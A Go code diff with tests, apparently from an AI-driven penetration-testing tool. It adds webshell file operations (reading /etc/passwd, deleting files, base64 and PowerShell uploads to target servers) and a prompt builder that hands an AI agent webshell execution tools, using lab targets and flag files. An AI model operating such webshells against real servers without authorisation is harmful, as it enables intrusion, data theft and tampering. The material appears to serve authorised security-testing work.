path = strings.TrimSpace(path)
|
||||
if path == "" {
|
||||
return "", false, "path is required for read"
|
||||
}
|
||||
if shellType == "asp" || shellType == "aspx" {
|
||||
command = "type " + h.escapePath(path)
|
||||
} else {
|
||||
command = "cat " + h.escapePath(path)
|
||||
}
|
||||
case "write":
|
||||
path = strings.TrimSpace(path)
|
||||
if path == "" {
|
||||
return "", false, "path is required for write"
|
||||
}
|
||||
command = "echo " + h.escapeForEcho(content) + " > " + h.escapePath(path)
|
||||
case "list", "read", "write":
|
||||
// 支持的动作
|
||||
default:
|
||||
return "", false, "unsupported action: " + action + " (supported: list, read, write)"
|
||||
}
|
||||
|
||||
// 若连接的 OS 为 auto,先探活并持久化,避免 AI/MCP 每次都对 Windows 发 `ls -la`
|
||||
osTag := conn.OS
|
||||
if normalizeWebshellOS(osTag) == "auto" {
|
||||
if probed := probeWebshellOSViaExec(func(cmd string) (string, bool) {
|
||||
out, exOk, _ := h.ExecWithConnection(conn, cmd)
|
||||
return out, exOk
|
||||
}); probed != "" {
|
||||
osTag = probed
|
||||
conn.OS = probed // 本次请求内使用探活结果
|
||||
h.persistDetectedOS(conn.ID, probed)
|
||||
}
|
||||
}
|
||||
|
||||
command, cmdErr := h.buildFileCommand(fileCommandInput{
|
||||
Action: action,
|
||||
Path: path,
|
||||
TargetPath: targetPath,
|
||||
Content: content,
|
||||
OS: osTag,
|
||||
ShellType: conn.Type,
|
||||
})
|
||||
if cmdErr != nil {
|
||||
return "", false, cmdErr.Error()
|
||||
}
|
||||
useGET := strings.ToUpper(strings.TrimSpace(conn.Method)) == "GET"
|
||||
cmdParam := strings.TrimSpace(conn.CmdParam)
|
||||
if cmdParam == "" {
|
||||
@@ -714,5 +945,5 @@ func (h *WebShellHandler) FileOpWithConnection(conn *database.WebShellConnection
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell FileOpWithConnection read body", zap.Error(readErr))
|
||||
}
|
||||
return string(out), resp.StatusCode == http.StatusOK, ""
|
||||
return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, ""
|
||||
}
|
||||
|
||||
@@ -0,0 +1,106 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
)
|
||||
|
||||
// WebshellSkillHintDefault 对话页 / Eino 单代理共用的 Skills 说明,放在 webshell 上下文末尾,
|
||||
// 供 AI 选择 skill 加载入口时参考。
|
||||
const WebshellSkillHintDefault = "Skills 包请使用「多代理 / Eino DeepAgent」会话中的内置 `skill` 工具渐进加载。"
|
||||
|
||||
// WebshellSkillHintMultiAgent 多代理 / Eino 多代理准备阶段使用的 Skills 说明
|
||||
const WebshellSkillHintMultiAgent = "Skills 包请使用 Eino 多代理内置 `skill` 工具。"
|
||||
|
||||
// webshellAssistantToolList AI 助手在 WebShell 上下文下允许使用的工具清单(展示给模型用)。
|
||||
// 注意:此处只是展示字符串,真正的权限限制是在调用方设置的 roleTools 切片里。
|
||||
const webshellAssistantToolList = "webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_knowledge_risk_types、search_knowledge_base"
|
||||
|
||||
// BuildWebshellAssistantContext 根据连接信息与用户原始消息组装 AI 助手的上下文提示词。
|
||||
// 上下文包含:连接 ID、备注、目标系统(及对应命令集建议)、响应编码、可用工具清单、Skills 加载入口、
|
||||
// 以及最终的用户请求。调用方只需要决定 skillHint 的文案(默认使用 WebshellSkillHintDefault)。
|
||||
//
|
||||
// 之所以把这段逻辑抽到共享函数里,是为了避免 agent.go / multi_agent_prepare.go 等多处复制粘贴,
|
||||
// 并确保当我们升级 OS / Encoding 文案时只需要改一处、测一处、同步生效。
|
||||
func BuildWebshellAssistantContext(conn *database.WebShellConnection, skillHint, userMsg string) string {
|
||||
if conn == nil {
|
||||
// 兜底:调用方已保证 conn 非 nil,这里只是防御性返回原消息
|
||||
return userMsg
|
||||
}
|
||||
remark := conn.Remark
|
||||
if remark == "" {
|
||||
remark = conn.URL
|
||||
}
|
||||
|
||||
targetOS := resolveWebshellOS(conn.OS, conn.Type) // 归一为 "linux" / "windows"
|
||||
encoding := normalizeWebshellEncoding(conn.Encoding)
|
||||
if skillHint == "" {
|
||||
skillHint = WebshellSkillHintDefault
|
||||
}
|
||||
|
||||
var b strings.Builder
|
||||
b.Grow(512 + len(userMsg))
|
||||
|
||||
b.WriteString("[WebShell 助手上下文] 连接 ID:")
|
||||
b.WriteString(conn.ID)
|
||||
b.WriteString(",备注:")
|
||||
b.WriteString(remark)
|
||||
b.WriteByte('\n')
|
||||
|
||||
// 目标系统:明确告诉 AI 能用/不能用的命令集,避免它对着 Windows 发 ls/cat/rm
|
||||
b.WriteString("- 目标系统:")
|
||||
b.WriteString(describeTargetOSForPrompt(targetOS))
|
||||
b.WriteByte('\n')
|
||||
|
||||
// 响应编码:仅在非 auto 时显式告知,auto 模式由后端自适应,不打扰模型
|
||||
if encHint := describeEncodingForPrompt(encoding); encHint != "" {
|
||||
b.WriteString("- 响应编码:")
|
||||
b.WriteString(encHint)
|
||||
b.WriteByte('\n')
|
||||
}
|
||||
|
||||
// 工具清单 & connection_id 约束:保持旧有表达,AI 已熟悉
|
||||
b.WriteString("可用工具(仅在该连接上操作时使用,connection_id 填 \"")
|
||||
b.WriteString(conn.ID)
|
||||
b.WriteString("\"):")
|
||||
b.WriteString(webshellAssistantToolList)
|
||||
b.WriteString("。")
|
||||
b.WriteString(skillHint)
|
||||
b.WriteString("\n\n用户请求:")
|
||||
b.WriteString(userMsg)
|
||||
|
||||
return b.String()
|
||||
}
|
||||
|
||||
// describeTargetOSForPrompt 返回某个 OS 对应的中文描述 + 推荐命令集 + 反例,
|
||||
// 命令列表覆盖文件管理最常用的 6 类动作(查看/读/删/改名/建目录/查找),让 AI 能直接照抄。
|
||||
func describeTargetOSForPrompt(targetOS string) string {
|
||||
switch targetOS {
|
||||
case "windows":
|
||||
return "Windows(推荐 cmd/PowerShell:dir /a、type、del /q /f、move /y、md、ren;" +
|
||||
"查找文件用 `dir /s /b 过滤词` 或 PowerShell `Get-ChildItem -Recurse`;" +
|
||||
"避免 ls / cat / rm / mv / find 等 Unix 命令,否则将返回 `不是内部或外部命令`)"
|
||||
case "linux":
|
||||
return "Linux/Unix(推荐 sh/bash:ls -la、cat、rm -f、mv、mkdir -p;" +
|
||||
"查找文件用 `find /path -name '*pattern*'`;" +
|
||||
"避免 dir、type、del、move 等 Windows 命令)"
|
||||
default:
|
||||
// 理论上不会走到这里,resolveWebshellOS 已经兜底
|
||||
return "未知(请先执行 `uname || ver` 探测再决定命令集)"
|
||||
}
|
||||
}
|
||||
|
||||
// describeEncodingForPrompt 返回响应编码的人类可读描述;auto 返回空串以减少 token。
|
||||
func describeEncodingForPrompt(encoding string) string {
|
||||
switch encoding {
|
||||
case "utf-8":
|
||||
return "UTF-8(目标原生 UTF-8,无需额外解码)"
|
||||
case "gbk":
|
||||
return "GBK(中文 Windows;后端已自动转码为 UTF-8 返回,若仍出现大量 \\uFFFD 替换字符说明命令失败或编码识别错误)"
|
||||
case "gb18030":
|
||||
return "GB18030(后端已自动转码为 UTF-8 返回)"
|
||||
default:
|
||||
return ""
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,170 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
)
|
||||
|
||||
func TestBuildWebshellAssistantContext_WindowsExplicit(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_win01",
|
||||
Remark: "IIS Windows 靶机",
|
||||
URL: "http://example.com/shell.php",
|
||||
Type: "php",
|
||||
OS: "windows",
|
||||
Encoding: "gbk",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "列出当前目录并告诉我 flag 在哪")
|
||||
|
||||
mustContain(t, got,
|
||||
"[WebShell 助手上下文]",
|
||||
"ws_win01",
|
||||
"IIS Windows 靶机",
|
||||
"目标系统:Windows",
|
||||
"dir /a",
|
||||
"move /y",
|
||||
"避免 ls / cat / rm",
|
||||
"响应编码:GBK",
|
||||
"后端已自动转码为 UTF-8",
|
||||
"connection_id 填 \"ws_win01\"",
|
||||
"webshell_exec、webshell_file_list",
|
||||
WebshellSkillHintDefault,
|
||||
"用户请求:列出当前目录并告诉我 flag 在哪",
|
||||
)
|
||||
// Windows 场景下不应出现 Linux 命令推荐
|
||||
mustNotContain(t, got, "推荐 sh/bash")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_LinuxAutoFromPHP(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_lnx01",
|
||||
Remark: "", // 测试备注为空时 fallback URL
|
||||
URL: "http://example.com/a.php",
|
||||
Type: "php",
|
||||
OS: "auto", // auto + php → linux
|
||||
Encoding: "", // auto 编码不显式提示
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "看看 /etc/passwd")
|
||||
|
||||
mustContain(t, got,
|
||||
"连接 ID:ws_lnx01",
|
||||
"备注:http://example.com/a.php", // 备注空时 fallback URL
|
||||
"目标系统:Linux/Unix",
|
||||
"ls -la",
|
||||
"mkdir -p",
|
||||
"避免 dir、type、del、move",
|
||||
"用户请求:看看 /etc/passwd",
|
||||
)
|
||||
// encoding=auto 不应出现"响应编码:"这一行
|
||||
mustNotContain(t, got, "响应编码:")
|
||||
// Linux 场景不应出现 Windows 命令
|
||||
mustNotContain(t, got, "推荐 cmd/PowerShell")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_AutoFromASPDefaultsToWindows(t *testing.T) {
|
||||
// 保留向后兼容:旧连接没配 os,shellType=asp 时应视为 Windows
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_asp01",
|
||||
Remark: "老 ASP 靶机",
|
||||
Type: "asp",
|
||||
OS: "", // 空串等同 auto
|
||||
Encoding: "gb18030",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "查当前用户")
|
||||
|
||||
mustContain(t, got,
|
||||
"目标系统:Windows",
|
||||
"响应编码:GB18030",
|
||||
"后端已自动转码为 UTF-8 返回",
|
||||
WebshellSkillHintMultiAgent,
|
||||
)
|
||||
// 多代理 skill 文案里没有 DeepAgent,不应混入 default 文案
|
||||
mustNotContain(t, got, "DeepAgent")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_MultiAgentSkillHint(t *testing.T) {
|
||||
conn := &database.WebShellConnection{ID: "ws_m1", Remark: "x", Type: "php", OS: "linux"}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "hi")
|
||||
mustContain(t, got, WebshellSkillHintMultiAgent)
|
||||
mustNotContain(t, got, "DeepAgent")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_DefaultSkillHintFallback(t *testing.T) {
|
||||
conn := &database.WebShellConnection{ID: "ws_d1", Remark: "x", Type: "php", OS: "linux"}
|
||||
// skillHint 传空字符串时应回退到 default
|
||||
got := BuildWebshellAssistantContext(conn, "", "hi")
|
||||
mustContain(t, got, WebshellSkillHintDefault)
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_UTF8EncodingIsAnnotated(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_u1", Remark: "u", Type: "jsp", OS: "linux", Encoding: "utf-8",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "hi")
|
||||
mustContain(t, got, "响应编码:UTF-8", "目标原生 UTF-8")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_NilConnReturnsUserMsg(t *testing.T) {
|
||||
// 防御性:conn == nil 时不 panic,直接返回原消息
|
||||
got := BuildWebshellAssistantContext(nil, WebshellSkillHintDefault, "just the message")
|
||||
if got != "just the message" {
|
||||
t.Errorf("nil conn should return userMsg as-is, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDescribeTargetOSForPrompt(t *testing.T) {
|
||||
cases := map[string][]string{
|
||||
"windows": {"Windows", "dir /a", "move /y", "PowerShell"},
|
||||
"linux": {"Linux/Unix", "ls -la", "mkdir -p"},
|
||||
"": {"未知", "uname"}, // 防御性分支
|
||||
}
|
||||
for in, wants := range cases {
|
||||
got := describeTargetOSForPrompt(in)
|
||||
for _, w := range wants {
|
||||
if !strings.Contains(got, w) {
|
||||
t.Errorf("describeTargetOSForPrompt(%q) should contain %q, got: %s", in, w, got)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDescribeEncodingForPrompt(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"utf-8": "UTF-8",
|
||||
"gbk": "GBK",
|
||||
"gb18030": "GB18030",
|
||||
"auto": "",
|
||||
"": "",
|
||||
}
|
||||
for in, want := range cases {
|
||||
got := describeEncodingForPrompt(in)
|
||||
if want == "" && got != "" {
|
||||
t.Errorf("describeEncodingForPrompt(%q) should return empty string, got: %s", in, got)
|
||||
}
|
||||
if want != "" && !strings.Contains(got, want) {
|
||||
t.Errorf("describeEncodingForPrompt(%q) should contain %q, got: %s", in, want, got)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ---- 小工具 ----
|
||||
|
||||
func mustContain(t *testing.T, text string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(text, s) {
|
||||
t.Errorf("expected text to contain %q\n--- text ---\n%s", s, text)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func mustNotContain(t *testing.T, text string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(text, s) {
|
||||
t.Errorf("text should not contain %q\n--- text ---\n%s", s, text)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,103 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"golang.org/x/text/encoding/simplifiedchinese"
|
||||
"golang.org/x/text/transform"
|
||||
)
|
||||
|
||||
// mustEncode 使用指定编码对 UTF-8 字符串做编码,得到原始字节,用于构造测试输入
|
||||
func mustEncode(t *testing.T, s string, enc string) []byte {
|
||||
t.Helper()
|
||||
var tr transform.Transformer
|
||||
switch enc {
|
||||
case "gbk":
|
||||
tr = simplifiedchinese.GBK.NewEncoder()
|
||||
case "gb18030":
|
||||
tr = simplifiedchinese.GB18030.NewEncoder()
|
||||
default:
|
||||
t.Fatalf("unsupported test encoding: %s", enc)
|
||||
}
|
||||
out, _, err := transform.Bytes(tr, []byte(s))
|
||||
if err != nil {
|
||||
t.Fatalf("mustEncode(%s) failed: %v", enc, err)
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func TestNormalizeWebshellEncoding(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": "auto",
|
||||
" ": "auto",
|
||||
"auto": "auto",
|
||||
"AUTO": "auto",
|
||||
"utf-8": "utf-8",
|
||||
"UTF-8": "utf-8",
|
||||
"utf8": "utf-8",
|
||||
"gbk": "gbk",
|
||||
"GBK": "gbk",
|
||||
"gb18030": "gb18030",
|
||||
"big5": "auto", // 未支持的回退到 auto
|
||||
"anything": "auto",
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := normalizeWebshellEncoding(in); got != want {
|
||||
t.Errorf("normalizeWebshellEncoding(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_AutoDetectsGBK(t *testing.T) {
|
||||
// 模拟 Windows 中文 cmd 输出的 GBK 字节流
|
||||
want := "用户名 SID 类型"
|
||||
raw := mustEncode(t, want, "gbk")
|
||||
|
||||
// auto 模式:UTF-8 校验失败后应当回退 GB18030 解码,得到原始中文
|
||||
got := decodeWebshellOutput(raw, "auto")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(auto) = %q, want %q", got, want)
|
||||
}
|
||||
|
||||
// 显式 GBK 模式:同样应当正确解码
|
||||
got = decodeWebshellOutput(raw, "gbk")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(gbk) = %q, want %q", got, want)
|
||||
}
|
||||
|
||||
// 显式 GB18030 模式:GBK 是 GB18030 子集,也应正确解码
|
||||
got = decodeWebshellOutput(raw, "gb18030")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(gb18030) = %q, want %q", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_PassthroughUTF8(t *testing.T) {
|
||||
// 已经是 UTF-8 的中文字符串,各模式都应返回原串(不破坏)
|
||||
want := "hello 世界"
|
||||
for _, enc := range []string{"", "auto", "utf-8"} {
|
||||
if got := decodeWebshellOutput([]byte(want), enc); got != want {
|
||||
t.Errorf("decodeWebshellOutput(%q) passthrough = %q, want %q", enc, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_ASCIIStable(t *testing.T) {
|
||||
// 纯 ASCII 在任何模式下都必须保持原样
|
||||
want := "whoami\nAdministrator\n"
|
||||
for _, enc := range []string{"", "auto", "utf-8", "gbk", "gb18030"} {
|
||||
if got := decodeWebshellOutput([]byte(want), enc); got != want {
|
||||
t.Errorf("decodeWebshellOutput(%q) ASCII = %q, want %q", enc, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_EmptyInput(t *testing.T) {
|
||||
// 空输入直接返回空串,不做额外分配
|
||||
if got := decodeWebshellOutput(nil, "gbk"); got != "" {
|
||||
t.Errorf("decodeWebshellOutput(nil) = %q, want empty", got)
|
||||
}
|
||||
if got := decodeWebshellOutput([]byte{}, "auto"); got != "" {
|
||||
t.Errorf("decodeWebshellOutput([]) = %q, want empty", got)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,348 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func newTestWebShellHandler() *WebShellHandler {
|
||||
return NewWebShellHandler(zap.NewNop(), nil)
|
||||
}
|
||||
|
||||
func TestNormalizeWebshellOS(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": "auto",
|
||||
" ": "auto",
|
||||
"auto": "auto",
|
||||
"AUTO": "auto",
|
||||
"linux": "linux",
|
||||
"Linux": "linux",
|
||||
"windows": "windows",
|
||||
"WINDOWS": "windows",
|
||||
"macos": "auto", // 未支持的回退 auto
|
||||
"solaris": "auto",
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := normalizeWebshellOS(in); got != want {
|
||||
t.Errorf("normalizeWebshellOS(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestResolveWebshellOS(t *testing.T) {
|
||||
type testCase struct {
|
||||
osTag string
|
||||
shellType string
|
||||
want string
|
||||
}
|
||||
cases := []testCase{
|
||||
// 显式 OS:按用户选择,忽略 shellType
|
||||
{"linux", "asp", "linux"},
|
||||
{"windows", "php", "windows"},
|
||||
{"LINUX", "jsp", "linux"},
|
||||
|
||||
// auto + 各种 shellType:asp/aspx → windows,其他 → linux
|
||||
{"auto", "asp", "windows"},
|
||||
{"auto", "aspx", "windows"},
|
||||
{"auto", "ASP", "windows"},
|
||||
{"auto", "php", "linux"},
|
||||
{"auto", "jsp", "linux"},
|
||||
{"auto", "custom", "linux"},
|
||||
{"auto", "", "linux"},
|
||||
|
||||
// 空/未知 OS 等价 auto
|
||||
{"", "asp", "windows"},
|
||||
{"", "php", "linux"},
|
||||
{"unknown", "aspx", "windows"},
|
||||
}
|
||||
for _, c := range cases {
|
||||
got := resolveWebshellOS(c.osTag, c.shellType)
|
||||
if got != c.want {
|
||||
t.Errorf("resolveWebshellOS(%q,%q) = %q, want %q", c.osTag, c.shellType, got, c.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestQuoteCmdPath(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": `"."`,
|
||||
`C:\Windows\Temp`: `"C:\Windows\Temp"`,
|
||||
`C:\Program Files\a`: `"C:\Program Files\a"`,
|
||||
`C:\weird"name\f.txt`: `"C:\weird""name\f.txt"`,
|
||||
`.`: `"."`,
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := quoteCmdPath(in); got != want {
|
||||
t.Errorf("quoteCmdPath(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestQuoteShellSinglePosix(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": ".",
|
||||
"/tmp/a b": "'/tmp/a b'",
|
||||
"/tmp/it's.txt": `'/tmp/it'\''s.txt'`,
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := quoteShellSinglePosix(in); got != want {
|
||||
t.Errorf("quoteShellSinglePosix(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_LinuxBranch 覆盖 Linux 目标下每个 action 产出的命令
|
||||
func TestBuildFileCommand_LinuxBranch(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
base := fileCommandInput{OS: "linux", ShellType: "php"}
|
||||
|
||||
mustContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(cmd, s) {
|
||||
t.Errorf("expected command to contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
mustNotContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(cmd, s) {
|
||||
t.Errorf("command should not contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// list with empty path defaults to '.'
|
||||
in := base
|
||||
in.Action = "list"
|
||||
cmd, err := h.buildFileCommand(in)
|
||||
if err != nil {
|
||||
t.Fatalf("list linux: unexpected err: %v", err)
|
||||
}
|
||||
mustContain(t, cmd, "ls -la", "'.'")
|
||||
|
||||
// list with path containing spaces
|
||||
in.Path = "/tmp/my files"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "ls -la ", "'/tmp/my files'")
|
||||
|
||||
// read with path
|
||||
in = base
|
||||
in.Action = "read"
|
||||
in.Path = "/etc/passwd"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "cat ", "'/etc/passwd'")
|
||||
|
||||
// read without path → error
|
||||
in.Path = ""
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpPathRequired {
|
||||
t.Errorf("read empty path: want errFileOpPathRequired, got %v", err)
|
||||
}
|
||||
|
||||
// delete
|
||||
in = base
|
||||
in.Action = "delete"
|
||||
in.Path = "/tmp/a.txt"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "rm -f ", "'/tmp/a.txt'")
|
||||
mustNotContain(t, cmd, "del")
|
||||
|
||||
// mkdir
|
||||
in.Action = "mkdir"
|
||||
in.Path = "/tmp/new/sub"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "mkdir -p ", "'/tmp/new/sub'")
|
||||
|
||||
// rename
|
||||
in = base
|
||||
in.Action = "rename"
|
||||
in.Path = "/tmp/a"
|
||||
in.TargetPath = "/tmp/b"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "mv -f ", "'/tmp/a'", "'/tmp/b'")
|
||||
|
||||
// rename missing target → error
|
||||
in.TargetPath = ""
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpRenameNeedsBothPaths {
|
||||
t.Errorf("rename empty target: want errFileOpRenameNeedsBothPaths, got %v", err)
|
||||
}
|
||||
|
||||
// write
|
||||
in = base
|
||||
in.Action = "write"
|
||||
in.Path = "/tmp/w.txt"
|
||||
in.Content = "hello 世界"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
b64 := base64.StdEncoding.EncodeToString([]byte("hello 世界"))
|
||||
mustContain(t, cmd, "echo '"+b64+"'", "| base64 -d", "> '/tmp/w.txt'")
|
||||
|
||||
// upload
|
||||
in = base
|
||||
in.Action = "upload"
|
||||
in.Path = "/tmp/bin"
|
||||
in.Content = "YWJjZA==" // base64 of "abcd"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "echo 'YWJjZA=='", "| base64 -d", "> '/tmp/bin'")
|
||||
|
||||
// upload oversized content → error
|
||||
in.Content = strings.Repeat("A", 513*1024)
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpUploadTooLarge {
|
||||
t.Errorf("upload too large: want errFileOpUploadTooLarge, got %v", err)
|
||||
}
|
||||
|
||||
// upload_chunk with chunk_index=0 uses single redirect
|
||||
in = base
|
||||
in.Action = "upload_chunk"
|
||||
in.Path = "/tmp/bin"
|
||||
in.Content = "YWJj"
|
||||
in.ChunkIndex = 0
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "base64 -d > '/tmp/bin'")
|
||||
mustNotContain(t, cmd, ">>")
|
||||
|
||||
// upload_chunk with chunk_index>0 uses append redirect
|
||||
in.ChunkIndex = 1
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "base64 -d >> '/tmp/bin'")
|
||||
|
||||
// unsupported action
|
||||
in = base
|
||||
in.Action = "nope"
|
||||
if _, err := h.buildFileCommand(in); err == nil || !strings.Contains(err.Error(), "unsupported action") {
|
||||
t.Errorf("unknown action: want unsupported action error, got %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_WindowsBranch 覆盖 Windows 目标下每个 action 产出的命令
|
||||
func TestBuildFileCommand_WindowsBranch(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
base := fileCommandInput{OS: "windows", ShellType: "php"}
|
||||
|
||||
mustContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(cmd, s) {
|
||||
t.Errorf("expected command to contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
mustNotContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(cmd, s) {
|
||||
t.Errorf("command should not contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// list
|
||||
in := base
|
||||
in.Action = "list"
|
||||
cmd, _ := h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "dir /a ", `"."`)
|
||||
mustNotContain(t, cmd, "ls -la")
|
||||
|
||||
in.Path = `C:\Users\Public Docs`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "dir /a ", `"C:\Users\Public Docs"`)
|
||||
|
||||
// read
|
||||
in = base
|
||||
in.Action = "read"
|
||||
in.Path = `C:\flag.txt`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "type ", `"C:\flag.txt"`)
|
||||
|
||||
// delete
|
||||
in.Action = "delete"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "del /q /f ", `"C:\flag.txt"`)
|
||||
mustNotContain(t, cmd, "rm -f")
|
||||
|
||||
// mkdir
|
||||
in.Action = "mkdir"
|
||||
in.Path = `C:\a\b\c`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "md ", `"C:\a\b\c"`)
|
||||
|
||||
// rename
|
||||
in = base
|
||||
in.Action = "rename"
|
||||
in.Path = `C:\a.txt`
|
||||
in.TargetPath = `C:\b.txt`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "move /y ", `"C:\a.txt"`, `"C:\b.txt"`)
|
||||
|
||||
// write → PowerShell base64 one-liner
|
||||
in = base
|
||||
in.Action = "write"
|
||||
in.Path = `C:\out.txt`
|
||||
in.Content = "hello 世界"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
wantB64 := base64.StdEncoding.EncodeToString([]byte("hello 世界"))
|
||||
mustContain(t, cmd,
|
||||
"powershell -NoProfile -NonInteractive -Command",
|
||||
"[Convert]::FromBase64String('"+wantB64+"')",
|
||||
"[IO.File]::WriteAllBytes('C:\\out.txt'",
|
||||
)
|
||||
mustNotContain(t, cmd, "echo ", "base64 -d")
|
||||
|
||||
// upload (chunk_index=0 equivalent) uses WriteAllBytes
|
||||
in = base
|
||||
in.Action = "upload"
|
||||
in.Path = `C:\bin\f`
|
||||
in.Content = "YWJjZA=="
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "WriteAllBytes('C:\\bin\\f'", "FromBase64String('YWJjZA==')")
|
||||
|
||||
// upload_chunk index=0 → WriteAllBytes
|
||||
in.Action = "upload_chunk"
|
||||
in.ChunkIndex = 0
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "WriteAllBytes(")
|
||||
mustNotContain(t, cmd, "FileMode]::Append")
|
||||
|
||||
// upload_chunk index>0 → append (Open with Append mode)
|
||||
in.ChunkIndex = 1
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "[IO.FileMode]::Append", "FromBase64String('YWJjZA==')")
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior 确保 os=auto 时与旧版 shellType 判定行为完全一致
|
||||
// asp/aspx 视为 Windows(旧行为),其他视为 Linux。
|
||||
